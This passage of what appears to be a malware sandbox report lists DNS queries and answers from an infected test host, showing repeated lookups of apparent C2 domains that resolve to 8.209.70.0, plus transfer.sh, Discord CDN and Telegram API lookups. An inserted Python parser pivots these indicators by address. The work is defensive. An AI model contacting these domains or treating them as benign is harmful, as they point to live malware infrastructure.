Jan 14, 2022 21:05:40.594440937 CET | 192.168.2.5 | 8.8.8.8 | 0xd440 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.760528088 CET | 192.168.2.5 | 8.8.8.8 | 0xe780 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.929953098 CET | 192.168.2.5 | 8.8.8.8 | 0xf572 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.097774982 CET | 192.168.2.5 | 8.8.8.8 | 0x6af7 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.270361900 CET | 192.168.2.5 | 8.8.8.8 | 0x53f1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.448005915 CET | 192.168.2.5 | 8.8.8.8 | 0xf55f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.652324915 CET | 192.168.2.5 | 8.8.8.8 | 0x9aa7 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:44.983249903 CET | 192.168.2.5 | 8.8.8.8 | 0x6528 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.159842968 CET | 192.168.2.5 | 8.8.8.8 | 0x8d7c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.366871119 CET | 192.168.2.5 | 8.8.8.8 | 0xaab3 | Standard query (0) | goo.su | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.883004904 CET | 192.168.2.5 | 8.8.8.8 | 0xc70f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.052864075 CET | 192.168.2.5 | 8.8.8.8 | 0x618a | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.254223108 CET | 192.168.2.5 | 8.8.8.8 | 0x1909 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.441540003 CET | 192.168.2.5 | 8.8.8.8 | 0xa099 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.627866030 CET | 192.168.2.5 | 8.8.8.8 | 0x2c58 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.859006882 CET | 192.168.2.5 | 8.8.8.8 | 0x4dac | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:47.035129070 CET | 192.168.2.5 | 8.8.8.8 | 0xda7c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:54.463512897 CET | 192.168.2.5 | 8.8.8.8 | 0x1e0c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:54.629339933 CET | 192.168.2.5 | 8.8.8.8 | 0xc241 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.111166954 CET | 192.168.2.5 | 8.8.8.8 | 0x927a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.279705048 CET | 192.168.2.5 | 8.8.8.8 | 0xa1d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.445163965 CET | 192.168.2.5 | 8.8.8.8 | 0x77e6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.622380018 CET | 192.168.2.5 | 8.8.8.8 | 0xdc86 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:59.973757029 CET | 192.168.2.5 | 8.8.8.8 | 0x109b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:00.155663013 CET | 192.168.2.5 | 8.8.8.8 | 0xa8a6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:00.540651083 CET | 192.168.2.5 | 8.8.8.8 | 0xa441 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:03.809344053 CET | 192.168.2.5 | 8.8.8.8 | 0x1cf8 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:04.012093067 CET | 192.168.2.5 | 8.8.8.8 | 0xab6b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:04.175112009 CET | 192.168.2.5 | 8.8.8.8 | 0xc3c1 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:05.754617929 CET | 192.168.2.5 | 8.8.8.8 | 0xcdcd | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:05.994390011 CET | 192.168.2.5 | 8.8.8.8 | 0x1c4 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:11.553761959 CET | 192.168.2.5 | 8.8.8.8 | 0x40ed | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:11.800241947 CET | 192.168.2.5 | 8.8.8.8 | 0x1d4c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:11.997239113 CET | 192.168.2.5 | 8.8.8.8 | 0xbaf8 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:12.131275892 CET | 192.168.2.5 | 8.8.8.8 | 0x3b8e | Standard query (0) | patmushta.info | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:12.174395084 CET | 192.168.2.5 | 8.8.8.8 | 0xa8a5 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:12.431009054 CET | 192.168.2.5 | 8.8.8.8 | 0xe862 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:14.960942984 CET | 192.168.2.5 | 8.8.8.8 | 0xc20d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:15.144355059 CET | 192.168.2.5 | 8.8.8.8 | 0x2ad7 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:15.331216097 CET | 192.168.2.5 | 8.8.8.8 | 0x31ff | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:16.744563103 CET | 192.168.2.5 | 8.8.8.8 | 0x3ccd | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:16.906570911 CET | 192.168.2.5 | 8.8.8.8 | 0x497c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:17.084588051 CET | 192.168.2.5 | 8.8.8.8 | 0xc79c | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:18.430932999 CET | 192.168.2.5 | 8.8.8.8 | 0x98a1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:18.594903946 CET | 192.168.2.5 | 8.8.8.8 | 0xa8de | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:18.834065914 CET | 192.168.2.5 | 8.8.8.8 | 0x4b70 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:22.463624954 CET | 192.168.2.5 | 8.8.8.8 | 0x471d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:25.071058035 CET | 192.168.2.5 | 8.8.8.8 | 0x577d | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.249953985 CET | 192.168.2.5 | 8.8.8.8 | 0x710e | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.282507896 CET | 192.168.2.5 | 8.8.8.8 | 0x8279 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.451266050 CET | 192.168.2.5 | 8.8.8.8 | 0x7bba | Standard query (0) | ipwhois.app | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.736634016 CET | 192.168.2.5 | 8.8.8.8 | 0xcbd5 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.026542902 CET | 192.168.2.5 | 8.8.8.8 | 0xa536 | Standard query (0) | c9d0e790b353537889bd47a364f5acff43c11f248.xyz | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.214611053 CET | 192.168.2.5 | 8.8.8.8 | 0xd2fb | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.452898026 CET | 192.168.2.5 | 8.8.8.8 | 0x9061 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:32.928822994 CET | 192.168.2.5 | 8.8.8.8 | 0xd453 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:34.723789930 CET | 192.168.2.5 | 8.8.8.8 | 0xa787 | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:34.852749109 CET | 192.168.2.5 | 8.8.8.8 | 0x332d | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001)
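
The extracted rows above run the Source IP and Dest IP columns together, and for the reply direction that concatenation is not unique: "8.8.8.8192.168.2.5" in the DNS Answers table also reads as 8.8.8.81 followed by 92.168.2.5. The Python below is an added example, not part of the Joe Sandbox report: it parses the query rows, uses the DNS transaction ID to pick, for each answer row, the endpoint split that mirrors its query, and then pivots the answers on the returned address, which is how one sees that host-data-coin-11.com, data-host-coin-8.com and privacy-tools-for-you-780.com all resolve to 8.209.70.0. Sample rows are copied from the two DNS tables of this report; the CET-only timestamp suffix and the fixed "Standard query (0)" / "IN (0x0001)" wording are assumptions tied to this report's layout.

```python
"""Parse flattened Joe Sandbox DNS query/answer rows and pivot on the answered address."""
import re
from collections import Counter, defaultdict

# Rows copied verbatim from the DNS Queries and DNS Answers tables of this report.
SAMPLE_QUERIES = [
    "Jan 14, 2022 21:04:55.877932072 CET192.168.2.58.8.8.80x7494Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)",
    "Jan 14, 2022 21:04:56.323577881 CET192.168.2.58.8.8.80x4933Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)",
    "Jan 14, 2022 21:04:59.856811047 CET192.168.2.58.8.8.80x1977Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)",
    "Jan 14, 2022 21:05:03.469676971 CET192.168.2.58.8.8.80xea8fStandard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)",
    "Jan 14, 2022 21:05:07.186929941 CET192.168.2.58.8.8.80x7f70Standard query (0)unicupload.topA (IP address)IN (0x0001)",
]
SAMPLE_ANSWERS = [
    "Jan 14, 2022 21:04:56.163722038 CET8.8.8.8192.168.2.50x7494No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)",
    "Jan 14, 2022 21:05:00.174863100 CET8.8.8.8192.168.2.50x1977No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)",
    "Jan 14, 2022 21:05:03.767642975 CET8.8.8.8192.168.2.50xea8fNo error (0)privacy-tools-for-you-780.com8.209.70.0A (IP address)IN (0x0001)",
]

OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4 = rf"{OCTET}(?:\.{OCTET}){{3}}"
IP_RE = re.compile(rf"^{IPV4}$")
RTYPE = r"A|AAAA|CNAME|MX|NS|PTR|SRV|TXT"

# Assumption: timestamps end in " CET" and the OP code text is always "Standard query (0)",
# as on this report page. The two IPs stay glued together in the "ips" group on purpose.
QUERY_RE = re.compile(
    r"^(?P<ts>.+? CET)(?P<ips>[\d.]+)0x(?P<txid>[0-9a-f]+)Standard query \(0\)"
    rf"(?P<name>.+?)(?P<rtype>{RTYPE}) \((?P<desc>[^)]*)\)IN \(0x0001\)$"
)
ANSWER_RE = re.compile(
    r"^(?P<ts>.+? CET)(?P<ips>[\d.]+)0x(?P<txid>[0-9a-f]+)(?P<rcode>[A-Za-z ]+\(\d+\))"
    rf"(?P<name>.+?)(?P<address>{IPV4})(?P<rtype>{RTYPE}) \((?P<desc>[^)]*)\)IN \(0x0001\)$"
)


def split_ip_pair(blob: str) -> list[tuple[str, str]]:
    """Every cut of 'A.B.C.DE.F.G.H' into two valid IPv4 addresses; there may be several."""
    return [
        (blob[:i], blob[i:])
        for i in range(7, len(blob) - 6)          # each side needs at least "0.0.0.0"
        if IP_RE.match(blob[:i]) and IP_RE.match(blob[i:])
    ]


def parse_queries(lines: list[str]) -> list[dict]:
    """Client -> resolver rows. The 192.168.x.y / 8.8.8.8 glue happens to split uniquely."""
    queries = []
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised query row: {line!r}")
        splits = split_ip_pair(m["ips"])
        if len(splits) != 1:
            raise ValueError(f"ambiguous endpoints {m['ips']!r}: {splits}")
        src, dst = splits[0]
        queries.append({"ts": m["ts"], "src": src, "dst": dst, "txid": m["txid"],
                        "name": m["name"], "rtype": m["rtype"]})
    return queries


def parse_answers(lines: list[str], queries: list[dict]) -> list[dict]:
    """Resolver -> client rows; the matching query (same transaction ID) fixes the IP split."""
    by_txid = {q["txid"]: q for q in queries}
    answers = []
    for line in lines:
        m = ANSWER_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised answer row: {line!r}")
        splits = split_ip_pair(m["ips"])
        q = by_txid.get(m["txid"])
        if q is not None:
            # A reply travels resolver -> client, i.e. the query's endpoints reversed.
            splits = [s for s in splits if s == (q["dst"], q["src"])]
        if len(splits) != 1:
            raise ValueError(f"cannot resolve endpoints {m['ips']!r}: {splits}")
        src, dst = splits[0]
        answers.append({"ts": m["ts"], "src": src, "dst": dst, "txid": m["txid"],
                        "rcode": m["rcode"].strip(), "name": m["name"],
                        "address": m["address"], "rtype": m["rtype"]})
    return answers


def domains_by_address(answers: list[dict]) -> dict[str, list[str]]:
    """Pivot: which queried names came back with the same address (shared C2 hosting)."""
    pivot = defaultdict(set)
    for a in answers:
        pivot[a["address"]].add(a["name"])
    return {addr: sorted(names) for addr, names in pivot.items()}


def query_counts(queries: list[dict]) -> Counter:
    """How often each name was looked up; a hot name is the beaconing candidate."""
    return Counter(q["name"] for q in queries)


if __name__ == "__main__":
    qs = parse_queries(SAMPLE_QUERIES)
    ans = parse_answers(SAMPLE_ANSWERS, qs)
    for addr, names in domains_by_address(ans).items():
        print(f"{addr} <- {', '.join(names)}")
    for name, n in query_counts(qs).most_common():
        print(f"{n:3d}  {name}")
```

Run against the full tables, the address pivot collapses three differently named C2 domains onto one host and the query counter makes the roughly two-second cadence of host-data-coin-11.com look-ups obvious; an answer whose transaction ID has no matching query and whose endpoints split more than one way is rejected rather than guessed.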

                                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 21:04:56.163722038 CET | 8.8.8.8 | 192.168.2.5 | 0x7494 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:56.340941906 CET | 8.8.8.8 | 192.168.2.5 | 0x4933 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:56.779325962 CET | 8.8.8.8 | 192.168.2.5 | 0xe41d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:57.214174986 CET | 8.8.8.8 | 192.168.2.5 | 0xf2bd | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:57.386841059 CET | 8.8.8.8 | 192.168.2.5 | 0x4af2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:57.824347973 CET | 8.8.8.8 | 192.168.2.5 | 0x1f4c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:59.204412937 CET | 8.8.8.8 | 192.168.2.5 | 0xd444 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:04:59.685348034 CET | 8.8.8.8 | 192.168.2.5 | 0x992b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:00.174863100 CET | 8.8.8.8 | 192.168.2.5 | 0x1977 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:02.064315081 CET | 8.8.8.8 | 192.168.2.5 | 0x7b24 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:02.544847012 CET | 8.8.8.8 | 192.168.2.5 | 0xf3bf | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:03.024291039 CET | 8.8.8.8 | 192.168.2.5 | 0x3fda | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:03.308669090 CET | 8.8.8.8 | 192.168.2.5 | 0xb555 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:03.767642975 CET | 8.8.8.8 | 192.168.2.5 | 0xea8f | No error (0) | privacy-tools-for-you-780.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:06.007678986 CET | 8.8.8.8 | 192.168.2.5 | 0x14b4 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:06.259608984 CET | 8.8.8.8 | 192.168.2.5 | 0xadd5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.209027052 CET | 8.8.8.8 | 192.168.2.5 | 0x7f70 | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.444776058 CET | 8.8.8.8 | 192.168.2.5 | 0x3d00 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.674513102 CET | 8.8.8.8 | 192.168.2.5 | 0x147d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:07.866856098 CET | 8.8.8.8 | 192.168.2.5 | 0x31d8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:08.102863073 CET | 8.8.8.8 | 192.168.2.5 | 0xb57c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:08.270349026 CET | 8.8.8.8 | 192.168.2.5 | 0x9388 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.264030933 CET | 8.8.8.8 | 192.168.2.5 | 0xf22f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.432816982 CET | 8.8.8.8 | 192.168.2.5 | 0x2e3a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.602001905 CET | 8.8.8.8 | 192.168.2.5 | 0x11d1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:10.796231985 CET | 8.8.8.8 | 192.168.2.5 | 0xe372 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:13.323513985 CET | 8.8.8.8 | 192.168.2.5 | 0x55 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:13.770212889 CET | 8.8.8.8 | 192.168.2.5 | 0xf6a9 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:13.964700937 CET | 8.8.8.8 | 192.168.2.5 | 0x3e41 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:14.163177967 CET | 8.8.8.8 | 192.168.2.5 | 0x7e8a | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:14.163177967 CET | 8.8.8.8 | 192.168.2.5 | 0x7e8a | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:14.163177967 CET | 8.8.8.8 | 192.168.2.5 | 0x7e8a | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:14.163177967 CET | 8.8.8.8 | 192.168.2.5 | 0x7e8a | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:14.163177967 CET | 8.8.8.8 | 192.168.2.5 | 0x7e8a | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:16.828425884 CET | 8.8.8.8 | 192.168.2.5 | 0x780d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:16.997550011 CET | 8.8.8.8 | 192.168.2.5 | 0x5162 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:17.479644060 CET | 8.8.8.8 | 192.168.2.5 | 0xdbe6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:28.908535957 CET | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:28.908535957 CET | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:28.908535957 CET | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:28.908535957 CET | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:28.908535957 CET | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:28.908535957 CET | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:31.855371952 CET | 8.8.8.8 | 192.168.2.5 | 0xd6fa | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:38.808269978 CET | 8.8.8.8 | 192.168.2.5 | 0x5d88 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:39.260253906 CET | 8.8.8.8 | 192.168.2.5 | 0xc0e2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:39.431783915 CET | 8.8.8.8 | 192.168.2.5 | 0x35d4 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:39.887650013 CET | 8.8.8.8 | 192.168.2.5 | 0xda93 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.091041088 CET | 8.8.8.8 | 192.168.2.5 | 0x6de5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.254775047 CET | 8.8.8.8 | 192.168.2.5 | 0x6600 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.434448957 CET | 8.8.8.8 | 192.168.2.5 | 0xc569 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.613733053 CET | 8.8.8.8 | 192.168.2.5 | 0xd440 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.777997971 CET | 8.8.8.8 | 192.168.2.5 | 0xe780 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:40.949367046 CET | 8.8.8.8 | 192.168.2.5 | 0xf572 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.115518093 CET | 8.8.8.8 | 192.168.2.5 | 0x6af7 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.289719105 CET | 8.8.8.8 | 192.168.2.5 | 0x53f1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.467417002 CET | 8.8.8.8 | 192.168.2.5 | 0xf55f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:41.669790030 CET | 8.8.8.8 | 192.168.2.5 | 0x9aa7 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.002109051 CET | 8.8.8.8 | 192.168.2.5 | 0x6528 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.177006006 CET | 8.8.8.8 | 192.168.2.5 | 0x8d7c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.388562918 CET | 8.8.8.8 | 192.168.2.5 | 0xaab3 | No error (0) | goo.su | | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.388562918 CET | 8.8.8.8 | 192.168.2.5 | 0xaab3 | No error (0) | goo.su | | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:45.901753902 CET | 8.8.8.8 | 192.168.2.5 | 0xc70f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.076894999 CET | 8.8.8.8 | 192.168.2.5 | 0x618a | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.273220062 CET | 8.8.8.8 | 192.168.2.5 | 0x1909 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.460666895 CET | 8.8.8.8 | 192.168.2.5 | 0xa099 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.649183035 CET | 8.8.8.8 | 192.168.2.5 | 0x2c58 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:46.880328894 CET | 8.8.8.8 | 192.168.2.5 | 0x4dac | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:47.054697990 CET | 8.8.8.8 | 192.168.2.5 | 0xda7c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:54.481074095 CET | 8.8.8.8 | 192.168.2.5 | 0x1e0c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:54.648716927 CET | 8.8.8.8 | 192.168.2.5 | 0xc241 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.130471945 CET | 8.8.8.8 | 192.168.2.5 | 0x927a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.298561096 CET | 8.8.8.8 | 192.168.2.5 | 0xa1d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.462627888 CET | 8.8.8.8 | 192.168.2.5 | 0x77e6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:05:56.639723063 CET | 8.8.8.8 | 192.168.2.5 | 0xdc86 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
